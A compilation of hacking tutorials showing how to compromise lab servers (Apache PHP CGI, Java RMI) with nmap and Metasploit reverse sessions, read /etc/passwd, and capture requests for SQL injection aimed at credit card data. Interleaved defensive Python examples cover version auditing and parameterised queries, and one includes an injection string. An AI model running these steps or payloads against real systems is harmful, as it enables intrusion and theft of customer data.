Hacking web servers – Apache PHP CGI (Easy Hacking)

Apache is widely used on hundreds of thousands of web servers across the internet. Therefore the chances of finding Apache servers running older versions are high, and with hundreds of vulnerabilities coming to light over the years it is all too easy to find an exploit for an older version and gain a root shell. Here we find a server running Apache 2.2.8 on port 80 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again: it is vital to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server, it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and the Metasploit Framework, which are built into Kali Linux, which we use for most of our tutorials. Download is here: https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV -sT --version-all -p 80 192.168.56.103

There is a great cheat sheet here for nmap cmds to help better understand what we are doing; https://www.stationx.net/nmap-cheat-sheet/

This shows us that port 80 is open, that it is running Apache and it gives us the version. All we do from here is go googling to find vulnerabilities for that version, and the year that version came out. Then we can choose either to target the version directly or find an exploit that came out after that version was released. You can use CVE numbers for that, as the first part denotes the year it was discovered.

Apache 2.2.8 was released on the 19th of January, 2008!! Let’s look for a CVE from after that date and one that is already available in metasploit framework.

I’m not going to teach you how to google…… but my search brought up a vulnerability in a PHP CGI script which was the default for that version of Apache. There will be loads of exploits available for this version due to its age; we just decided to use this one as it is super reliable for the video demo.

Let’s fire up metasploit and find it.

search type:exploit multi/http/php

We could have also searched by date. Anyway, the one we want is number 0, so we simply type

use 0

It has already configured a payload for us so we check the info on the exploit

show info

Once we’re happy we check which options we need to add to allow it to run.

show options

We can see in the options what is required and what is not by reading the “required” column.

The port is correct (80); we need to add RHOSTS and LHOST.
  1. RHOSTS – This is the remote host, or the victim machine(s). We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machine’s IP address, so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now is access the password file by using:

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can log in as admin/root and do whatever we want.

Hacking web servers – Java (Easy Hacking)

Java is rarely updated on web servers, and so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again: it is vital to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server, it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and the Metasploit Framework, which are built into Kali Linux, which we use for most of our tutorials. Download is here: https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV 192.168.56.103

We can see Java RMI running on port 1099.
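Both tutorials above start from the same step: read the service and version nmap reports for each open port, then decide whether that version is old enough to be a problem. The following is an added example (not part of the original tutorials) of doing that check from the defender's side, as a version-inventory script a sysadmin can run over saved nmap -sV output to flag anything below a patch baseline, or any service (such as Java RMI) that should not be reachable at all. The sample scan lines and the baseline versions are constructed for the example; a real baseline comes from your own patch policy.

```python
"""Flag outdated or unwanted services in nmap -sV output.

Added example, not part of the original tutorials. The sample output and
the baseline versions below are constructed for illustration only.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample of nmap -sV "normal" output (not real scan results).
SAMPLE_SCAN = """\
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.2.8 ((Ubuntu) DAV/2)
1099/tcp open  java-rmi GNU Classpath grmiregistry
8080/tcp open  http     Apache httpd 2.4.57
22/tcp   open  ssh      OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
"""

# Hypothetical minimum acceptable versions (an assumption for this example;
# take the real values from your patch policy).
BASELINE: Dict[str, Tuple[int, ...]] = {
    "Apache httpd": (2, 4, 0),
    "OpenSSH": (8, 0),
}

# Services that should not be exposed on a web server, whatever the version.
DISALLOWED_SERVICES = {"java-rmi"}

# One nmap port line: "80/tcp   open  http     Apache httpd 2.2.8 (...)"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+"
    r"(?P<service>\S+)\s*(?P<version>.*)$"
)


def parse_version(text: str) -> Optional[Tuple[int, ...]]:
    """Return the first dotted numeric version in text, e.g. '2.2.8' -> (2, 2, 8)."""
    m = re.search(r"\b(\d+(?:\.\d+)+)", text)
    if not m:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def parse_scan(output: str) -> List[dict]:
    """Turn nmap normal output into one dict per open port."""
    rows = []
    for line in output.splitlines():
        m = PORT_LINE.match(line)
        if not m or m.group("state") != "open":
            continue  # header lines and closed/filtered ports are skipped
        version_text = m.group("version").strip()
        rows.append({
            "port": int(m.group("port")),
            "service": m.group("service"),
            "version_text": version_text,
            "version": parse_version(version_text),
        })
    return rows


def find_findings(output: str) -> List[str]:
    """Return one human-readable finding per port that needs attention."""
    findings = []
    for row in parse_scan(output):
        if row["service"] in DISALLOWED_SERVICES:
            findings.append(f"{row['port']}: {row['service']} exposed "
                            "(should not be reachable)")
            continue
        for product, minimum in BASELINE.items():
            if row["version_text"].startswith(product) and row["version"]:
                # Tuple comparison gives correct ordering for dotted versions.
                if row["version"] < minimum:
                    have = ".".join(map(str, row["version"]))
                    want = ".".join(map(str, minimum))
                    findings.append(f"{row['port']}: {product} {have} "
                                    f"below baseline {want}")
    return findings


if __name__ == "__main__":
    for finding in find_findings(SAMPLE_SCAN):
        print(finding)
```

Run against a saved scan (`nmap -sV -oN scan.txt host`, then feed the file contents to `find_findings`), the script reports Apache 2.2.8 and OpenSSH 4.7 as below baseline and port 1099 as an exposed service, while Apache 2.4.57 on port 8080 passes; the same three lines are exactly what the two tutorials above go on to exploit, which is the point of running this before an attacker does.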

Next we head over to the metasploit framework to search for any built in exploits we may be able to use.

search type:exploit platform:java rmi

The cmd above is pretty self-explanatory: we are performing a search with a type of “exploit” for the platform “java” and the additional term “rmi”. We receive the following output:

The highlighted module in the output is the one we will use.

To load this module we use the “use” cmd

use exploit/multi/misc/java_rmi_server

It informs us it has already selected a payload so next we list the “info” page

info

Then once we are happy we know what we need to configure we load the options

show options

We can see in the options what is required and what is not by reading the “required” column.

Everything is set for us except the RHOSTS and LHOST settings, which we need to ensure have the correct IP address.

  1. RHOSTS – This is the remote host, or the victim machine(s). We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machine’s IP address, so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using:

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can log in as admin/root and do whatever we want. All because no one updated Java!

How to capture a web page request – Stealing Customer Credit Card Details part 2

This is a quick blog off the back of numerous requests for an additional guide for a video we posted on YouTube: https://www.youtube.com/watch?v=cThifvgCcPc

In the above video we show how you can steal credit card numbers straight out of the database by using a legitimate web page request and feeding this into sqlmap.

If you want to know how to capture the web request then this tutorial will show you.

In order to capture the request we need a proxy which sits between the website and our browser and which sees the raw data of the requests and responses. This not only gives us visibility, it also gives us the ability to manipulate the requests, but we shall save that for future blogs.

In our demo we are using Kali from here: https://www.kali.org/downloads/ which is a hacker’s operating system that comes with a browser proxy pre-installed, and so we shall be using Burp Suite. You can install Burp Suite separately if you wish from here: https://portswigger.net/burp/communitydownload

However, if you are just starting out then I recommend downloading Kali and installing it on VirtualBox (https://www.virtualbox.org/wiki/Downloads), as Kali also includes sqlmap, which is the other application you need to complete the full attack as shown across both videos.

There are plenty of guides on YouTube so we won’t be covering installation here.

Let’s get into it:

The reason this method works so well is because you are providing a LEGITIMATE request to the web server. What does this mean? Well, if you are not a member of a website and you try to log in, you will be denied access because you don’t have valid credentials; this is not a legitimate request. If you are a member, you provide your username and password and you are permitted access to the website; this is legitimate.

How does this help? Well, a lot of websites have a “manage your account” section, “search for past purchases”, or “my payment information”, all of which allow you to search information in your own account. If the website is not coded correctly, however, you may be able to use this same search in YOUR account to actually return information from OTHER users’ accounts. This is where the legitimate request comes in. You are using a legitimate request to the website, and seeing if this can be manipulated to allow the return of more information than expected. This technique is called SQL Injection.
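The paragraph above describes the root cause from the attacker's side: a logged-in user's search string is pasted into the SQL query, so the query can be changed to return other users' rows. The following added example (not code from the original post or from the demo site) shows the same account-lookup endpoint written both ways in Python with sqlite3, so a developer can see why the hardened version returns only the caller's own rows no matter what is typed into the search box. The table, the two accounts and the sample inputs are constructed for the example.

```python
"""Account lookup: string-built SQL beside the parameterised, ownership-scoped form.

Added example, not from the original post. The schema, rows and inputs are
constructed for illustration only.
"""
import sqlite3
from typing import List, Tuple


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory table: two accounts, each with one card on file."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE accounts (username TEXT NOT NULL, card_last4 TEXT NOT NULL);
        INSERT INTO accounts VALUES ('canaryman', '1234');
        INSERT INTO accounts VALUES ('otheruser', '9876');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, logged_in_user: str,
                      search: str) -> List[Tuple[str, str]]:
    """The broken version: user input is spliced into the SQL text.

    The WHERE clause is meant to restrict results to the session user, but
    because `search` becomes part of the statement, a search string that
    closes the quote and adds OR 1=1 turns the restriction off.
    """
    sql = ("SELECT username, card_last4 FROM accounts "
           f"WHERE username = '{logged_in_user}' AND username LIKE '%{search}%'")
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, logged_in_user: str,
                    search: str) -> List[Tuple[str, str]]:
    """The fixed version: placeholders, and the owner filter is bound server-side.

    `logged_in_user` comes from the session, never from the request, and both
    values travel as parameters, so the search text can only ever be a LIKE
    pattern compared against the caller's own rows.
    """
    sql = ("SELECT username, card_last4 FROM accounts "
           "WHERE username = ? AND username LIKE ?")
    return conn.execute(sql, (logged_in_user, f"%{search}%")).fetchall()


def compare(search: str) -> Tuple[int, int]:
    """Row counts (vulnerable, hardened) for the same session user and search."""
    conn = setup_db()
    return (len(lookup_vulnerable(conn, "canaryman", search)),
            len(lookup_hardened(conn, "canaryman", search)))


if __name__ == "__main__":
    print("normal search:", compare("canary"))        # both return 1 row
    print("injected search:", compare("%' OR 1=1 --"))  # vulnerable returns 2, hardened 0
```

The only runtime difference between the two functions is whether the database driver or Python's f-string assembles the statement; the hardened version also makes the ownership check independent of anything the client sends, which is the IDOR half of the problem the post describes. When reviewing a lookup endpoint, look for both: parameters everywhere, and the owner taken from the session rather than the form.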

In this demo we are using an account details lookup page to perform this attack.

We are logged in as canaryman, and submit a search for our own account, and this completes as expected.

Burp Suite is already running, but in order for it to be able to intercept the requests we need to configure our browser to use Burp Suite as a proxy. For our machine we go to the browser settings > network settings > then configure as below:

It will be very similar for all browsers; the thing to remember is that you are using your localhost address 127.0.0.1, and Burp Suite listens on port 8080.

We now perform the same search again, but this time we go to the PROXY and INTERCEPT tabs and set “intercept” to on. This catches the request as it leaves the browser and before it hits the web server.

We save this to a file as shown, then forward the request so it completes. That’s it.
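What Burp writes to that file is the raw HTTP request exactly as the browser sent it: request line, headers, a blank line, then the body. The following added example (not from the original post) parses such a file in Python and lists every user-controlled input it carries (query string, form fields, cookies), which is the inventory a developer needs when deciding what the server must validate and parameterise. The captured request below is constructed for the example and stands in for the account lookup from the demo.

```python
"""Parse a raw HTTP request saved from an intercepting proxy.

Added example, not from the original post. SAMPLE_REQUEST is a constructed
capture of a form submission, not a real request from the demo site.
"""
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed capture: a POST to an account lookup page, as a proxy would save it.
SAMPLE_REQUEST = (
    "POST /account/lookup?lang=en HTTP/1.1\r\n"
    "Host: shop.example\r\n"
    "Cookie: session=abc123; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 28\r\n"
    "\r\n"
    "username=canaryman&search=ca"
)


def parse_raw_request(raw: str) -> Dict:
    """Split a raw request into method, path, headers, query, form and cookies."""
    # Proxies save CRLF line endings; tolerate LF-only files too.
    raw = raw.replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)

    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    url = urlsplit(target)
    query = parse_qs(url.query, keep_blank_values=True)

    form: Dict[str, List[str]] = {}
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body, keep_blank_values=True)

    cookies: Dict[str, str] = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value

    declared = headers.get("content-length")
    body_length_ok = declared is None or int(declared) == len(body.encode())

    return {
        "method": method,
        "path": url.path,
        "version": version,
        "headers": headers,
        "query": query,
        "form": form,
        "cookies": cookies,
        "body": body,
        "body_length_ok": body_length_ok,
    }


def user_controlled_inputs(parsed: Dict) -> List[str]:
    """Every value the client chose, as 'location:name', for the validation checklist."""
    names = [f"query:{k}" for k in parsed["query"]]
    names += [f"form:{k}" for k in parsed["form"]]
    names += [f"cookie:{k}" for k in parsed["cookies"]]
    return names


if __name__ == "__main__":
    req = parse_raw_request(SAMPLE_REQUEST)
    print(req["method"], req["path"])
    for name in user_controlled_inputs(req):
        print("  user input:", name)
```

Read a saved capture with `open("request.txt").read()` and pass it to `parse_raw_request`; every name the second function prints is a value the server receives from the client and must treat as untrusted, including the cookies, which is why the ownership check in a lookup page has to come from the server-side session rather than from anything in this file.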

Watch https://www.youtube.com/watch?v=cThifvgCcPc to see how this request is used to get other users credit card details from the website.